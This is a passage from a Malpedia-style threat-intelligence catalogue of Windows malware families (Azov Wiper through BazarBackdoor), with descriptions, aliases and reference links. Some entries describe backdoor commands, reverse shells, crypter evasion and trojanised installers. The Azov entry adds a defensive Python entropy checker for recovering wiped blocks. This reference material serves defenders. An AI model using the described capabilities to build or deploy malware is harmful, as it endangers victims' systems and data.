https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html

https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html

https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/

https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://blog.talosintelligence.com/2021/12/magnat-campaigns-use-malvertising-to.html

https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/

https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/

https://www.splunk.com/en_us/blog/security/-applocker-rules-as-defense-evasion-complete-analysis.html

https://asec.ahnlab.com/en/26517/

https://www.youtube.com/watch?v=EyDiIAtdI

https://www.virusbulletin.com/uploads/pdf/magazine/2021/202104-design-vulnerabilities-azorult-cc-panels.pdf

https://yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/

https://ke-la.com/information-stealers-a-new-landscape/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/

https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware

https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/

https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/

https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/

https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf

https://blog.checkpoint.com/2022/05/10/a-german-car-attack-on-german-vehicle-businesses/

https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors

https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/

https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers

https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside

https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan

https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/

https://community.riskiq.com/article/2a36a7d2/description

http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html

https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://unit42.paloaltonetworks.com/cybersquatting/

https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/

https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html

https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/

https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan

https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/

https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf

https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east

https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat

https://fr3d.hk/blog/gazorp-thieving-from-thieves

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update

https://isc.sans.edu/diary/25120

https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d

https://community.riskiq.com/article/56e28880

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/

https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/

https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/

Azov Wiper

According to Check Point, this malware is a wiper rather than the ransomware it announces itself as. It is hand-written in FASM (flat assembler) and unrecoverably overwrites data in blocks of 666 bytes, using multiple threads.
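
The fixed 666-byte overwrite granularity is what a forensic triage step can key on: per-block Shannon entropy separates blocks that were replaced with random data from blocks that still hold the original content. The example below is added here and is not Check Point’s tooling or Azov’s code. Its sample file is constructed (low-entropy text with every even 666-byte block overwritten by pseudo-random bytes); that alternating layout is an assumption made for the demonstration, not Azov’s documented pattern, and the page says only that the overwrite happens in 666-byte blocks. Whatever the real layout, the same classifier reports which blocks are worth salvaging.

```python
import math
import random
from typing import List, Tuple

BLOCK_SIZE = 666  # overwrite granularity reported for Azov


def shannon_entropy(chunk: bytes) -> float:
    """Bits per byte; 8.0 is the maximum for uniformly random data."""
    if not chunk:
        return 0.0
    counts = [0] * 256
    for b in chunk:
        counts[b] += 1
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def classify_blocks(data: bytes, threshold: float = 7.0) -> List[Tuple[int, float, str]]:
    """Label each 666-byte block 'overwritten' or 'intact' by its entropy.
    Compressed or encrypted originals also score high, so confirm with the
    expected file type before trusting an 'intact' label."""
    labels = []
    for idx, off in enumerate(range(0, len(data), BLOCK_SIZE)):
        h = shannon_entropy(data[off:off + BLOCK_SIZE])
        labels.append((idx, round(h, 2), "overwritten" if h >= threshold else "intact"))
    return labels


def salvage_intact(data: bytes, threshold: float = 7.0) -> bytes:
    """Concatenate only the blocks that look untouched (partial recovery at best)."""
    return b"".join(data[i * BLOCK_SIZE:(i + 1) * BLOCK_SIZE]
                    for i, _, label in classify_blocks(data, threshold) if label == "intact")


def build_constructed_sample(seed: int = 7, blocks: int = 8) -> Tuple[bytes, List[int]]:
    """Constructed victim file: repetitive text with every even block overwritten.
    Returns the damaged bytes and the indices that were overwritten (ground truth)."""
    rng = random.Random(seed)
    original = (b"Quarterly report line; figures unchanged.\n" * 200)[:blocks * BLOCK_SIZE]
    data = bytearray(original)
    hit = []
    for i in range(0, blocks, 2):
        data[i * BLOCK_SIZE:(i + 1) * BLOCK_SIZE] = bytes(rng.getrandbits(8) for _ in range(BLOCK_SIZE))
        hit.append(i)
    return bytes(data), hit


if __name__ == "__main__":
    damaged, truth = build_constructed_sample()
    for idx, h, label in classify_blocks(damaged):
        print(f"block {idx:3d}  entropy {h:5.2f}  {label}")
    print("overwritten (ground truth):", truth)
    print("salvaged bytes:", len(salvage_intact(damaged)), "of", len(damaged))
```

On a real disk image the threshold needs calibrating per file type (plain text sits around 4 to 5 bits per byte, office documents and archives near 8), and the salvage output is a fragment set, not a restored file; the page’s point stands that data in overwritten blocks is gone.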

The tag is: misp-galaxy:malpedia="Azov Wiper"

Azov Wiper is also known as:

Table 2950. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

https://research.checkpoint.com/2022/pulling-the-curtains-on-azov-ransomware-not-a-skidsware-but-polymorphic-wiper/

https://twitter.com/CPResearch/status/1587837524604465153

Babadeda

According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers’ analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.

The tag is: misp-galaxy:malpedia="Babadeda"

Babadeda is also known as:

Table 2951. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities

Babuk (Windows)

Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and an old 32-bit PE executable were observed over time as well. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.

The tag is: misp-galaxy:malpedia="Babuk (Windows)"

Babuk (Windows) is also known as:

  • Babyk

  • Vasa Locker

Table 2953. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

https://resources.prodaft.com/wazawaka-report

https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

https://www.bleepingcomputer.com/news/security/leaked-babuk-locker-ransomware-builder-used-in-new-attacks/

https://securelist.com/ransomware-world-in-2021/102169/

https://www.bleepingcomputer.com/news/security/data-leak-marketplaces-aim-to-take-over-the-extortion-economy/

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf

https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html

https://www.zerofox.com/blog/babuk-ransomware-variant-delta-plus/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/are-virtual-machines-the-new-gold-for-cyber-criminals/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751

https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/

https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/

https://ke-la.com/new-russian-speaking-forum-a-new-place-for-raas/

https://raw.githubusercontent.com/vc0RExor/Malware-Threat-Reports/main/Ransomware/Babuk/Babuk_Ransomware_EN_2021_05.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings

https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1

http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-moving-to-vm-nix-systems.pdf

https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/IOCs-blog-Ransomware%20Actor%20Abuses%20Genshin%20Impact%20Anti-Cheat%20Driver%20to%20Kill%20Antivirus.txt

https://killingthebear.jorgetesta.tech/actors/evil-corp

https://therecord.media/builder-for-babuk-locker-ransomware-leaked-online/

https://blog.morphisec.com/babuk-ransomware-variant-major-attack

https://www.bleepingcomputer.com/news/security/babuk-ransomware-is-back-uses-new-version-on-corporate-networks/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf

https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2

https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f

https://github.com/EmissarySpider/ransomware-descendants

https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/

https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://www.databreaches.net/babuk-re-organizes-as-payload-bin-offers-its-first-leak/

https://www.fr.sogeti.com/globalassets/france/avis-dexperts—​livres-blancs/cybersecchronicles-_babuk.pdf

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/is-there-really-such-a-thing-as-a-low-paid-ransomware-operator/

https://mssplab.github.io/threat-hunting/2023/06/15/malware-analysis-babuk.html

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://twitter.com/GossiTheDog/status/1409117153182224386

https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html

https://chuongdong.com/reverse%20engineering/2021/01/16/BabukRansomware-v3/

https://blog.cyble.com/2022/05/06/rebranded-babuk-ransomware-in-action-darkangels-ransomware-performs-targeted-attack/

https://krebsonsecurity.com/2022/02/wazawaka-goes-waka-waka/

https://lab52.io/blog/quick-review-of-babuk-ransomware-builder/

https://twitter.com/Sebdraven/status/1346377590525845504

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/

https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/

https://sekurak.pl/udalo-nam-sie-zrealizowac-wywiad-z-grupa-ransomware-babuk-ktora-zaszyfrowala-policje-metropolitarna-w-waszyngtonie/

BabyLon RAT

The tag is: misp-galaxy:malpedia="BabyLon RAT"

BabyLon RAT is also known as:

Table 2954. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat

https://twitter.com/KorbenD_Intel/status/1110654679980085262

BabyShark

BabyShark is a Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first-stage HTA from a remote location, thus it can be delivered via different file types, including PE files as well as malicious documents. It exfiltrates system information to the C2 server, maintains persistence on the system, and waits for further instruction from the operator.

The tag is: misp-galaxy:malpedia="BabyShark"

BabyShark is also known as:

  • LATEOP

Table 2956. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf

https://www.youtube.com/watch?v=rfzmHjZX70s

https://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/

https://twitter.com/i/web/status/1099147896950185985

https://blog.alyac.co.kr/3352

https://www.youtube.com/watch?v=Dv2_DK3tRgI

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf

https://blog.google/threat-analysis-group/how-were-protecting-users-from-government-backed-attacks-from-north-korea/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1

https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.html

https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html

https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood

Bachosens

The tag is: misp-galaxy:malpedia="Bachosens"

Bachosens is also known as:

Table 2957. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens

https://medium.com/threat-intel/cybercrime-investigation-insights-bachosens-e1d6312f6b3a

BACKBEND

FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.

The tag is: misp-galaxy:malpedia="BACKBEND"

BACKBEND is also known as:

Table 2958. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

BackNet

The tag is: misp-galaxy:malpedia="BackNet"

BackNet is also known as:

Table 2960. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.backnet

https://github.com/valsov/BackNet

Backoff POS

The tag is: misp-galaxy:malpedia="Backoff POS"

Backoff POS is also known as:

Table 2961. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.backoff

https://securelist.com/sinkholing-the-backoff-pos-trojan/66305/

BadEncript

The tag is: misp-galaxy:malpedia="BadEncript"

BadEncript is also known as:

Table 2965. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript

https://twitter.com/PhysicalDrive0/status/833067081981710336

badflick

BADFLICK is a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.

The tag is: misp-galaxy:malpedia="badflick"

badflick is also known as:

Table 2966. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick

https://blog.amossys.fr/badflick-is-not-so-bad.html

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

BadNews

The tag is: misp-galaxy:malpedia="BadNews"

BadNews is also known as:

Table 2968. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews

http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1

https://lab52.io/blog/new-patchwork-campaign-against-pakistan/

https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/

https://blog.malwarebytes.com/threat-intelligence/2022/01/patchwork-apt-caught-in-its-own-web/

https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign

https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/

https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html

https://securelist.com/apt-trends-report-q1-2021/101967/

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2

https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

Bagle

The tag is: misp-galaxy:malpedia="Bagle"

Bagle is also known as:

Table 2969. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle

https://archive.f-secure.com/weblog/archives/carrera_erdelyi_VB2004.pdf

BalkanDoor

According to ESET, BalkanDoor is a simple backdoor with a small number of commands (download and execute a file, create a remote shell, take a screenshot). It can be used to automate tasks on the compromised computer or to automatically control several affected computers at once. We have seen six versions of the backdoor, with a range of supported commands, evolve since 2016.

The tag is: misp-galaxy:malpedia="BalkanDoor"

BalkanDoor is also known as:

Table 2972. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door

https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/

BalkanRAT

The goal of BalkanRAT, which is the more complex part of the malicious Balkan toolset (cf. BalkanDoor), is to deploy and leverage legitimate commercial software for remote administration. The malware has several additional components to help load, install and conceal the existence of the remote desktop software. A single long-term campaign involving BalkanRAT has been active at least since January 2016 and targeted accounting departments of organizations in Croatia, Serbia, Montenegro, and Bosnia and Herzegovina (judging by the fact that the contents of the emails, the included links and the decoy PDFs all concerned taxes). It was legitimately signed and installed by an exploit of the WinRAR ACE vulnerability (CVE-2018-20250).

The tag is: misp-galaxy:malpedia="BalkanRAT"

BalkanRAT is also known as:

Table 2973. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_rat

https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/

Banatrix

The tag is: misp-galaxy:malpedia="Banatrix"

Banatrix is also known as:

Table 2975. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix

https://www.cert.pl/en/news/single/banatrix-an-indepth-look/

bangat

The tag is: misp-galaxy:malpedia="bangat"

bangat is also known as:

Table 2979. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat

https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal

BanPolMex RAT

BanPolMex is a remote access trojan that uses TCP for communication.

It uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.

It sends detailed information about the victim’s environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.

It supports almost 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker’s C&C server. As in many RATs from the Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indices are convertible into a meaningful ASCII representation, which even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.

It has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).

BanPolMex RAT was delivered to victims of a watering hole campaign targeting employees of Polish and Mexican banks, which was discovered in February 2017. It is usually loaded by HOTWAX.

The tag is: misp-galaxy:malpedia="BanPolMex RAT"

BanPolMex RAT is also known as:

Table 2982. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex

https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf

https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/

Barb(ie) Downloader

The tag is: misp-galaxy:malpedia="Barb(ie) Downloader"

Barb(ie) Downloader is also known as:

Table 2983. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.barbie

https://www.cybereason.com/blog/operation-bearded-barbie-apt-c-23-campaign-targeting-israeli-officials

barkiofork

The tag is: misp-galaxy:malpedia="barkiofork"

barkiofork is also known as:

Table 2985. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.barkiofork

https://www.symantec.com/connect/blogs/backdoorbarkiofork-targets-aerospace-and-defense-industry

BATLOADER

According to PCrisk, BATLOADER is part of the infection chain where it is used to perform the initial compromise. This malware is used to execute payloads like Ursnif. Our team has discovered BATLOADER after executing installers for legitimate software (such as Zoom, TeamViewer, Visual Studio) bundled with this malware. We have found those installers on compromised websites.

The tag is: misp-galaxy:malpedia="BATLOADER"

BATLOADER is also known as:

Table 2989. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bat_loader

https://www.esentire.com/blog/batloader-continues-signed-msix-app-package-abuse

https://www.seqrite.com/blog/decoding-batloader-2-x-unmasking-the-threat-of-stealthy-malware-tactics/

https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif

https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html

https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery

https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html

https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html

https://intel471.com/blog/malvertising-surges-to-distribute-malware

https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle

https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489

https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a

https://www.mandiant.com/resources/seo-poisoning-batloader-atera

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

BazarBackdoor

BazarBackdoor is a small backdoor, probably by a TrickBot "spin-off" like Anchor. It is called team9 backdoor (and the corresponding loader: team9 restart loader).

For now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.

The tag is: misp-galaxy:malpedia="BazarBackdoor"

BazarBackdoor is also known as:

  • BEERBOT

  • KEGTAP

  • Team9Backdoor

  • bazaloader

  • bazarloader

Table 2990. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://twitter.com/anthomsec/status/1321865315513520128

https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware

https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue

https://www.hhs.gov/sites/default/files/bazarloader.pdf

https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html

https://isc.sans.edu/diary/27308

https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/

https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/

https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/

https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group

https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/

https://www.youtube.com/watch?v=pIXl79IPkLI

https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d

https://unit42.paloaltonetworks.com/api-hammering-malware-families/

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit_John_Hammond_Huntress_Analyzing_Ryuk.pdf

https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html

https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/

https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware

https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/

https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/

https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/

https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://malwarebookreports.com/a-look-back-at-bazarloaders-dga/

https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/

https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors

https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/

https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/

https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/

https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I

https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/

https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/

https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/

https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html

https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor

https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/

